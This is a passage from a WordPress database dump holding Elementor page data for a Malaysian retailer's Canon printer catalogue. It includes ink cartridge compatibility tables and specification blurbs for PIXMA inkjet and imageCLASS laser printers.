Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3884,2736,'_wp_page_template','template-fullwidth.php'),(3885,2736,'_elementor_edit_mode','builder'),(3886,2736,'_elementor_template_type','post'),(3887,2736,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p><br \\/>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p><br \\/>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p><br \\/>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS 